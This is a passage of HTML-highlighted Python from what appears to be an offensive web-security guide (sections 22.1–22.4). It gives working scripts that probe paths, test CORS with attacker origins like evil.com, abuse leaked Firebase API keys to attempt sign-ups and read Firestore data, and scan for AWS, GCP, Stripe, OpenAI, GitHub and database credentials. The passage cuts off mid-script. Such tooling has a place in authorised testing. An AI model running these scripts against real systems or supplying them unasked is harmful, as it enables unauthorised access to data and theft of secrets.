&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; path &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; paths:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;scheme&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;domain&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;:&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;port&lt;span style="color:#a6d189"&gt;}{&lt;/span&gt;path&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(url, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;, verify&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;, allow_redirects&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;False&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; &lt;span style="color:#99d1db"&gt;len&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text) &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;50&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; (&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;) -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;text[:&lt;span style="color:#ef9f76"&gt;100&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;301&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;302&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;⚠️ &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; redirect to &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;Location&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;?&amp;#39;&lt;/span&gt;)&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; [&lt;span style="color:#ef9f76"&gt;401&lt;/span&gt;, &lt;span style="color:#ef9f76"&gt;403&lt;/span&gt;]:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔒 &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;except&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;Exception&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; e:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="222-bulk-cors-test" &gt;
&lt;div&gt;
&lt;a href="#222-bulk-cors-test"&gt;
##
&lt;/a&gt;
22.2 Bulk CORS Test
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;origins &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a6d189"&gt;&amp;#34;https://evil.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;null&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;https://target.com.evil.com&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://evil.target.com&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;http://localhost&amp;#34;&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; url &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; urls:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; origin &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; origins:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(url, headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;Origin&amp;#34;&lt;/span&gt;: origin}, timeout&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ef9f76"&gt;5&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; acao &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;Access-Control-Allow-Origin&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; acac &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;headers&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#34;Access-Control-Allow-Credentials&amp;#34;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; acao &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; origin &lt;span style="color:#99d1db;font-weight:bold"&gt;and&lt;/span&gt; acac &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;true&amp;#34;&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 CRITICAL CORS: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | Origin: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;origin&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;elif&lt;/span&gt; acao &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; origin:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;⚠️ CORS reflection: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;url&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt; | Origin: &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;origin&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="223-firebase-project-discovery" &gt;
&lt;div&gt;
&lt;a href="#223-firebase-project-discovery"&gt;
##
&lt;/a&gt;
22.3 Firebase Project Discovery
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract Firebase configs from JS bundles and test&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Search for Firebase configs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pattern &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:firebase\.initializeApp|firebaseConfig)\s*\(\s*(\{[^}]+\})&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# or apiKey: &amp;#34;AIza...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# For each config found, test:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;def&lt;/span&gt; &lt;span style="color:#8caaee"&gt;test_firebase&lt;/span&gt;(api_key, project_id):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Test signUp&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;post(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://identitytoolkit.googleapis.com/v1/accounts:signUp?key=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;api_key&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; json&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#34;email&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;test@test.com&amp;#34;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#34;password&amp;#34;&lt;/span&gt;:&lt;span style="color:#a6d189"&gt;&amp;#34;Test123!&amp;#34;&lt;/span&gt;,&lt;span style="color:#a6d189"&gt;&amp;#34;returnSecureToken&amp;#34;&lt;/span&gt;:&lt;span style="color:#ef9f76"&gt;True&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 SignUp OPEN in &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Test Firestore&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;https://firestore.googleapis.com/v1/projects/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/databases/(default)/documents?key=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;api_key&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;status_code &lt;span style="color:#99d1db;font-weight:bold"&gt;==&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;200&lt;/span&gt;:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;print&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;🔥 Firestore PUBLIC in &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project_id&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="224-auto-extract-secrets-from-multiple-sources" &gt;
&lt;div&gt;
&lt;a href="#224-auto-extract-secrets-from-multiple-sources"&gt;
##
&lt;/a&gt;
22.4 Auto-Extract Secrets from Multiple Sources
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#81c8be"&gt;import&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;re&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;requests&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;json&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;glob&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;,&lt;/span&gt; &lt;span style="color:#ef9f76"&gt;os&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;SECRET_PATTERNS &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# AWS&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AWS Access Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:AKIA|ASIA)[A-Z0-9]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{16}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;AWS Secret Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:&amp;#34;|^)(?:secretAccessKey|aws_secret_access_key)[=:]\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]?([A-Za-z0-9/+=]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{40}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# GCP&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;GCP SA Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(&amp;#34;type&amp;#34;:\s*&amp;#34;service_account&amp;#34;.*?&amp;#34;private_key&amp;#34;)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;GCP API Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;AIza[0-9A-Za-z\-_]&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{35}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Firebase&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Firebase Config&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;apiKey:\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]AIza[^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]{30,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Supabase&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Supabase URL&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:supabaseUrl|SUPABASE_URL):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;](https://[^&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;]+\.supabase\.co)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Supabase Anon Key&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:supabaseKey|SUPABASE_ANON_KEY):\s*[&amp;#34;&lt;/span&gt;&lt;span style="color:#8caaee"&gt;\&amp;#39;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;](eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+)&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# JWT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;JWT Token&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;eyJ[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{10,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# API keys&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;SendGrid&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;SG\.[A-Za-z0-9_\-]{20,}\.[A-Za-z0-9_\-]{20,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;Stripe Live&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:sk_live|pk_live)_[A-Za-z0-9]{24,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;OpenAI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;sk-[A-Za-z0-9]{32,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;GitHub Token&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;(?:ghp|gho|ghu|ghs|ghr)_[A-Za-z0-9_]{36,}&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# Databases&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;MongoDB URI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;mongodb(?:\+srv)?://[^@\s]+@[^\s]+&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;PostgreSQL URI&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;postgres(?:ql)?://[^@\s]+@[^\s]+&amp;#39;&lt;/span&gt;,
